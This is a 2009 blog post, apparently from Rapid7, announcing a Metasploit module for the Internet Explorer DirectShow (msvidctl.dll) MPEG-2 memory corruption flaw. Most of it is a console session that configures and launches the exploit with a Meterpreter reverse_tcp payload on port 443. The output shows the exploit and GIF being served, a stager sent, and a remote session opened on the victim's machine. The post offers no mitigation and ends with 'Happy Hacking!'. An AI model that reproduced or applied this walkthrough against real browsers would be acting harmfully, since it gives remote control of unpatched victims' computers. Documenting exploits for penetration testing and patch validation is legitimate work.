IE DirectShow (msvidctl.dll) MPEG-2 Metasploit Exploit

Blog Post created by rapid7-admin on Jul 7, 2009


There is a new IE exploit that has been recently released into the wild. The exploit is for DirectShow (msvidctl.dll) MPEG-2. The exploit utilizes an ActiveX control in addition to a GIF file  include, to perform a memory corruption attack. The vulnerability affects users of both IE 6 and IE7.


Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer which was posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.


Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.


=[ msf v3.3-dev
+ -- --=[ 384 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops

=[ 162 aux

msf > use windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > set LHOST
msf exploit(msvidctl_mpeg2) > set LPORT 443
LPORT => 443
msf exploit(msvidctl_mpeg2) > set URIPATH /test.html
URIPATH => /test.html
msf exploit(msvidctl_mpeg2) > set SRVPORT 9000
SRVPORT => 9000
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*]  Local IP:
[*] Server started.
[*] Sending HTML to…
[*] Sending exploit to…
[*] Sending GIF to…
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened ( ->


Happy Hacking!